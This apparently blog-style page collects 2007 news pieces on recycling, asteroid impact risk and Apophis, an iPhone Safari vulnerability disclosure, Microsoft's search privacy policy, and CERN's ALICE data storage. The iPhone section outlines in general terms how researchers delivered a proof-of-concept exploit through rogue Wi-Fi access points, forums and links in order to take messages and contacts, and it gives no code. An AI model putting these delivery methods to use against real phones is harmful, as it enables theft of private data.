EPA
It does get recycled, honestEvidently there is plenty of scope for further innovation in recycling. New ideas and approaches will be needed, since many communities and organisations have set high targets for recycling. Europe's packaging directive requires member states to recycle 60% of their glass and paper, 50% of metals and 22.5% of plastic packaging by the end of 2008. Earlier this year the European Parliament voted to increase recycling rates by 2020 to 50% of municipal waste and 70% of industrial waste. Recycling rates can be boosted by charging households and businesses more if they produce more rubbish, and by reducing the frequency of rubbish collections while increasing that of recycling collections.
Meanwhile a number of cities and firms (including Wal-Mart, Toyota and Nike) have adopted zero-waste targets. This may be unrealistic but Matt Hale, director of the office of solid waste at America's Environmental Protection Agency, says it is a worthy goal and can help companies think about better ways to manage materials. It forces people to look at the entire life-cycle of a product, says Dr Hale, and ask questions: Can you reduce the amount of material to begin with? Can you design the product to make recycling easier?
If done right, there is no doubt that recycling saves energy and raw materials, and reduces pollution. But as well as trying to recycle more, it is also important to try to recycle better. As technologies and materials evolve, there is room for improvement and cause for optimism. In the end, says Ms Krebs, “waste is really a design flaw.”

The ultimate environmental catastrophe,The threat from other space




.99942 Apophis







ONE of the main weaknesses of the environmental movement has been its unfortunate predilection for using doom-laden language and catastrophic superlatives to describe problems that are serious but not immediately disastrous. But one calamity that truly deserves such a description is almost never talked about. There are tens of millions of asteroids in the solar system, and several thousand move in orbits that take them close to Earth. Sooner or later, one of them is going to hit it.

Several have done so in the past. Earth's active surface and enthusiastic weather conspire to scrub the tell-tale impact craters from the planet's surface relatively quickly, but the pockmarked surface of the moon-where such scars endure for much longer-testifies to the amount of rubble floating in the solar system. Earth's thick atmosphere makes it better protected than the moon: asteroids smaller than about 35 metres (115 feet) across will burn up before hitting its surface. Nevertheless, plenty of craters exist. The Earth Impact Database in Canada lists more than 170.



Fortunately, such impacts are relatively rare, at least on human timescales. Statisticians calculate that the risk to lives and property posed by meteorite strikes are roughly comparable with those posed by earthquakes.




Although the chance of an impact may be small in any given year, the consequences could be enormous. The effect of an impact depends on an object's size and speed. A meteorite a few metres wide could level a city. The largest (a kilometre or more in diameter) could wreak ecological havoc across the entire globe. David Morrison, a NASA scientist, argued at a recent conference that a large meteorite strike is the only known disaster (except perhaps global nuclear war) that could put civilisation at risk
Examples give a more visceral illustration than statistics. The Chicxulub crater, buried beneath modern Mexico, is 65m years old and 180km (112 miles) across. Some think that the ten-kilometre meteorite that created it threw so much dust into the atmosphere that it blotted out the sun and led to the extinction of the dinosaurs. In 1908 a comparatively tiny piece of space-borne rock, 30-50 metres across, exploded above Tunguska, a remote part of Siberia. The blast-hundreds of times more powerful than the atom bomb dropped on Hiroshima 37 years later-felled 80m trees over 2,150 square kilometres. Only blind luck ensured that it took place in a relatively unpopulated part of the world. Astronomers are currently trying to work out whether a 270-metre asteroid named 99942 Apophis will hit Earth in 2036 (probably not, but it would be nice to be sure).




Happily for humanity, technology has advanced to the point where it is possible, in principle, to avoid such a collision. In 1998 NASA agreed to try to find and catalogue, by 2008, 90% of those asteroids bigger than 1km in diameter that might pose a threat to Earth. Any deemed dangerous would have to be pushed into a safer orbit. One obvious way to do this is with nuclear weapons, a method that has the pleasing symmetry of using one potential catastrophe to avert another. But scientists counsel caution. A nuclear blast could simply split one large asteroid into several smaller ones, some of which could still be on a collision course.




Other plans have been suggested. One is to use a high-speed spaceship simply to ram the asteroid out of the way; another is to land a craft on the rock's surface and use its engines to manoeuvre the asteroid to safety. A subtler method is to park a spaceship nearby and use its tiny gravity to pull the asteroid gradually off course. For now, all such suggestions are theoretical, although the European Space Agency is planning a mission, named Don Quijote, to test the ramming tactic in 2011.




These schemes offer consolation, but any effort to deflect an asteroid requires plenty of advance warning, and that may not always be available. NASA has so far catalogued only the very largest, "civilisation-killing" asteroids. Plenty of smaller ones remain undiscovered, and they could inflict considerable damage. In 2002 a mid-sized asteroid (50-120 metres across) missed Earth by 121,000km-one-third of the distance to the moon. Astronomers discovered it three days after the event. Comets, which originate from the outer reaches of the solar system, are faster moving and harder to track than asteroids, but carry just as much potential for catastrophe.




But perhaps the biggest problem is humanity's indifference. Currently only America is spending any money on detection, and even there, politicians have other priorities. Much of the work is done by Cornell University's Arecibo radar in Puerto Rico, which is facing federal funding cuts. The telescope costs roughly $1m a year to operate. As an insurance policy for civilisation, the price looks cheap.





Inside News 99942 Apophis





Apophis belongs to a group called the "Aten asteroids", asteroids with an orbital semi-major axis less than one astronomical unit. This particular one has an orbital period about the Sun of 323 days, and its path brings it across Earth's orbit twice on each passage around the Sun.




Based upon the observed brightness, Apophis's length was estimated at 415 m (1350 ft); a more refined estimate based on spectroscopic observations at NASA's Infrared Telescope Facility in Hawaii by Binzel, Rivkin, Bus, and Tokunaga (2005) is 350 m (1150 ft). Its mass is estimated to be 4.6×1010 kg.




As of February 2005 it is predicted that the asteroid will pass just below the altitude of geosynchronous satellites, which are at 35,786 km (22,300 mi). Apophis' brightness will peak at magnitude 3.3, with a maximum angular speed of 42° per hour. Such a close approach by an asteroid of this size is expected to occur only every 1,300 years or so. The maximum apparent angular diameter will be ~2 arcseconds, which means it will be a starlike point of light in all but the very largest telescopes.





Discovery
Apophis was discovered on June 19, 2004, by Roy A. Tucker, David J. Tholen, and Fabrizio Bernardi of the NASA-funded University of Hawaii Asteroid Survey from Kitt Peak National Observatory in Arizona. This group observed for two nights. The new object received the provisional designation 2004 MN4.




On December 18, the object was rediscovered from Australia by Gordon Garradd of the Siding Spring Survey, another NASA-funded NEA survey. Further observations from around the globe over the next several days allowed the Minor Planet Center to confirm the connection to the June discovery.





Naming
When first discovered, the object received the provisional designation 2004 MN4 (sometimes written 2004 MN4), and news and scientific articles about it referred to it by that name. When its orbit was sufficiently well calculated it received the permanent number 99942 (on June 24, 2005), the first numbered asteroid with Earth-impact solutions (to its orbit determination from observations). Receiving a permanent number made it eligible for naming, and it promptly received the name "Apophis" as of July 19, 2005. Apophis is the Greek name of the Ancient Egyptian god Apep, "the Destroyer", who dwells in the eternal darkness of the Duat (underworld) and tries to destroy the Sun during its nightly passage.




Although the Greek name for the Egyptian god may be appropriate, Tholen and Tucker (two of the co-discovers of the asteroid) are reportedly fans of the TV series Stargate SG-1. The show's main antagonist in the first several seasons was an alien named Apophis who took the name for the Egyptian god and sought to destroy Earth[2].




.Armageddon




More:
http://neo.jpl.nasa.gov/risk/a99942.html






Technorati : , , , , ,

Security flaw found in iPhone


A team of independent security experts has found a flaw in the Apple iPhone that allows hackers to take control of the device, the New York Times reported today.
The researchers at Independent Security Evaluators, which test the security of devices by hacking them, found that the Wi-Fi connectivity of the iPhone allowed them to take control of it and mine the wealth of private information the phones contain. The researchers also said that they could redirect users to a malicious Web site that could also circumvent the security on the phone.
The story quotes Lynn Fox, spokeswoman for Apple, saying, "Apple takes security very seriously and has a great track record of addressing potential vulnerabilities before they can affect users."




Welcome iphone
Shortly after the iPhone was released, a group of security researchers at Independent Security Evaluators decided to investigate how hard it would be for a remote adversary to compromise the private information stored on the device. Within two weeks of part time work, we had successfully discovered a vulnerability, developed a toolchain for working with the iPhone's architecture (which also includes some tools from the #iphone-dev community), and created a proof-of-concept exploit capable of delivering files from the user's iPhone to a remote attacker. We have notified Apple of the vulnerability and proposed a patch. Apple is currently looking into it.
A member of our team, Dr. Charlie Miller, will be presenting the full details of discovering the vulnerability and creating the exploit at BlackHat on August 2nd. This site will be updated to reflect those details at that time; until then, we have decided only to release general information about exploiting the iPhone.
How the exploit works

The exploit is delivered via a malicious web page opened in the Safari browser on the iPhone. There are several delivery vectors that an attacker might utilize to get a victim to open such a web page. For example:
An attacker controlled wireless access point: Because the iPhone learns access points by name (SSID), if a user ever gets near an attacker-controlled access point with the same name (and encryption type) as an access point previously trusted by the user, the iPhone will automatically use the malicious access point. This allows the attacker to add the exploit to any web page browsed by the user by replacing the requested page with a page containing the exploit.
A misconfigured forum website: If a web forum's software is not configured to prevent users from including potentially dangerous data in their posts, an attacker could cause the exploit to run in any iPhone browser that viewed the thread. (This would require some slight changes in our proof of concept exploit, however.)
A link delivered via e-mail or SMS: If an attacker can trick a user into opening a website that the attacker controls, the attacker can easily embed the exploit into the main page of the website.
When the iPhone's version of Safari opens the malicious web page, arbitrary code embedded in the exploit is run with administrative privileges. In our proof of concept, this code reads the log of SMS messages, the address book, the call history, and the voicemail data. It then transmits all this information to the attacker. However, this code could be replaced with code that does anything that the iPhone can do. It could send the user's mail passwords to the attacker, send text messages that sign the user up for pay services, or record audio that could be relayed to the attacker

MICROSOFT is moving to protect consumer privacy in web search and advertising and has called on the internet industry to support it.


MICROSOFT is moving to protect consumer privacy in web search and advertising and has called on the internet industry to support it.
Microsoft said it was responding to public concern over the recent consolidation of the online ad industry as well as stepped-up interest from government regulators in its call for a comprehensive rather than piecemeal approach to privacy.
"We think it's time for an industry-wide dialogue," Peter Cullen, Microsoft's chief privacy officer, said in an interview. "The current patchwork of protections and how companies explain them is really confusing to consumers."
Specifically, Microsoft said it would make all web search query data anonymous after 18 months on its "Live Search" service, unless it receives user consent to store it longer. The policy changes are retroactive and worldwide, it said.
Microsoft planned to store customer search data separately from data tied to people, email addresses or phone numbers and take steps to ensure no unauthorised correlation of these types of data could be made. It would also permanently remove "cookie" user identification data, web address, or other identifiers.
"Microsoft is going to do a more thorough scrub of customer data once it is too old," said Peter Swire, a law professor at Ohio State University who served as US privacy czar in the 1990s. "Previously, the practice was to do a partial scrub."
As part of Microsoft's push, Ask.com, the web search business of Barry Diller's IAC/InterActiveCorp, has agreed to join Microsoft in calling on the industry to adopt a common set of privacy practices for data collection, commercial use and consumer protection in search and online advertising. Last week, it unveiled AskEraser, a service that will allow Ask customers to change their privacy preferences at any time.
Microsoft's initiatives follow recent moves by Google, the dominant provider of web searches and the company most under fire by privacy advocates concerned at how rapid advances in search technology may pose unprecedented threats to consumer privacy.
Google set in motion industry efforts to limit how long web search data is stored by being first to say it will in the future cleanse personal information from its databases after 18 months. Microsoft is one-upping Google by making its move retroactive.
Google has stepped up its own efforts to reach compromises with European Union and US policy-makers in recent months.
Microsoft said it was taking new steps to notify users how technologies affected them, giving users more specific controls over their privacy and setting tighter limits on how long it kept search data. It will also minimise the amount of data it collects via its "Live Search" and online advertisement targeting services.
"Search, itself, is a relatively new business and advertising-supported search, and the issues it raises, are also relatively new," Mr Cullen said. "You have almost a collision of these two things."
Both Google and Microsoft have faced scrutiny from US and European regulators over their plans to merge with major players in the online advertising industry.
Google is seeking approval to buy advertising services firm DoubleClick for $US3.1 billion ($3.5 billion) , a move analysts said would more than double the number of web users to whom it serves up online ads. Similarly, Microsoft plans to buy diversified ad services company aQuantive, a DoubleClick rival, for $US6 billion. A shareholder meeting to approve the deal is set for August.
The DoubleClick deal, in particular, faces congressional hearings over the potential privacy issues that could arise from the concentration of data about consumer web-surfing habits, buying behaviour and advertising data.
Forrester privacy analyst Jennifer Albornoz Mulligan said the internet industry was feeling the heat from customers who were confused by the many conflicting state and federal privacy policies across banking, retail, advertising and elsewhere.
Most consumers had given up reading the detailed privacy notices contained in footnotes on websites because everyone knew that "you can adopt privacy principles without really doing a great job of protecting privacy", Ms Mulligan said.
Mr Cullen said ,Microsoft did not believe a one-size-fits-all approach to online privacy could work. It wanted consumers who sought anonymity online to have the power to do so, while giving customers who prized convenience over anonymity the access to a new class of personalised services that depend on user data.
"People want a high degree of personalisation, but they don't want to feel like they are being surveilled," he said


Back Story of Peter Cullen


REDMOND, Wash., June 23, 2003 — Microsoft Corp. today announced that Peter Cullen, a recognized privacy leader and current corporate privacy officer for Royal Bank of Canada (RBC), is joining the company as chief privacy strategist.
Cullen, who will join Microsoft on July 14, brings more than a decade of experience in privacy and data protection work to Microsoft's Trustworthy Computing initiative. Cullen will report to Scott Charney, chief Trustworthy Computing strategist, working closely with him to help ensure that privacy protections and best practices are incorporated into all Microsoft® products, services, systems and internal processes.
"Peter Cullen has the experience to drive Microsoft's commitment to privacy protections to the next level. With his deep background in privacy and data protection practices and their relationship to customer value, Peter will be an effective advocate for strong and innovative consumer privacy safeguards," Charney said. "We look forward to having Peter apply his experiences and skills to benefit Microsoft's customers and partners through the privacy pillar of our Trustworthy Computing initiative."
Cullen is widely recognized as a pioneer in privacy and helped develop the financial industry's best practices around the collection and use of information. His work resulted in Royal Bank of Canada (RBC) establishing important competitive differentiation that remains an example to several industries.
While at RBC, Cullen established the Corporate Privacy Group and its practices, a first for a Canadian financial institution. He also implemented an integrated privacy management/compliance structure for U.S. operations, which included six affiliate companies. As a result, Cullen helped RBC become recognized as a North American leader in the area of privacy management.
Microsoft's Trustworthy Computing initiative reflects the company's belief that technology must truly be trustworthy if it is ever to realize its full potential to enhance people's lives. Microsoft's Trustworthy Computing effort is focused on four key pillars: security, privacy, reliability and business integrity.
• Security means ensuring that one's information and data are safe. • Privacy means placing people in control of their personal information as well as respecting their right to be left alone. • Reliability means ensuring that technology works every time people need it. • Business integrity means being clear, open, fair, respectful and responsive to customers and the public.
Cullen said he decided to join Microsoft because of its commitment to driving privacy protections and programs within the company and throughout its industry.
"I look forward to joining Microsoft to help the company deliver on its vision of trustworthy computing," Cullen said. "Microsoft has placed a priority on privacy, and I look forward to applying my experience in developing innovative privacy practices and programs to deliver high-quality technologies and services to our customers and partners."
Cullen holds an MBA from Richard Ivey School of Business at the University of Western Ontario. He is a founding member of two networks of chief privacy officers and is an active public speaker.

Sunday, July 22, 2007

CERN believes that the LHC will let scientists re-create how the universe behaved immediately after the Big Bang,Search for God (Particles) Drives Mas


About CERN (the European Organization for Nuclear Research) and its massive particle accelerators in Angels & Demons by Dan Brown of The Da Vinci Code fame. In that book, the lead character travels to the cavernous research institute on the border of France and Switzerland to help investigate a murder. In real life, one of CERN's grisliest problems is finding storage for the massive amounts of data derived from its four high-profile physics experiments making use of the institute's large hadron collider (LHC). Due for operation in May 2008, the LHC is a 27-kilometer-long device designed to accelerate subatomic particles to ridiculous speeds, smash them into each other and then record the results.



The LHC experiments will study everything from the tiniest forms of matter to the questions surrounding the Big Bang. The latter subject provided Pierre Vande Vyvre, a project leader for data acquisition for CERN, with a particularly thorny challenge: He had to design a storage system for one of the four experiments, ALICE (A Large Ion Collider Experiment). It's one of the biggest physics experiments of our time, boasting a team of more than 1,000 scientists from around the world.


For one month per year, the LHC will be spitting out project data to the ALICE team at a rate of 1GB per second. That's 1GB per second, for a full month, "day and night," Vande Vyvre says. For this month, that data rate is an entire order of magnitude larger than each of the other three experiments being done with the LHC. In total, the four experiments will generate petabytes of data.CERN believes that the LHC will let scientists re-create how the universe behaved immediately after the Big Bang. At that time, everything was a "sort of hot dense soup...composed of elementary particles," the project's webpage explains. The LHC can trigger "little bangs" that let ALICE scientists study how the particles act and come together, helping answer questions about the actual structure of atoms.

"The data is what the whole experiment is producing," Vande Vyvre says. "This is the most precious thing we have.”Vande Vyvre is charged with managing the PCs, storage equipment, and custom and homegrown software surrounding the ALICE project's data before it hits the data center and gets archived. The ALICE group's experiments will start running in May 2008, but the storage rollout began in September 2006.

The ALICE experiment grabs its data from 500 optical fiber links and feeds data about the collisions to 200 PCs, which start to piece the many snippets of data together into a more coherent picture. Next, the data travels to another 50 PCs that do more work putting the picture together, then record the data to disk near the experiment site, which is about 10 miles away from the data center. "During this one month, we need a huge disk buffer,


" News Inside News,The European Organization for Nuclear Research (French: Organisation européenne pour la recherche nucléaire), commonly known as CERN (see Naming), pronounced [sɝn] (or [sɛʀn] in French), is the world's largest particle physics laboratory, situated just northwest of Geneva on the border between France and Switzerland. The convention establishing CERN was signed on 29 September 1954. From the original 12 signatories of the CERN convention, membership has grown to the present 20 member states. Its main function is to provide the particle accelerators and other infrastructure needed for high-energy physics research. Numerous experiments have been constructed at CERN by international collaborations to make use of them.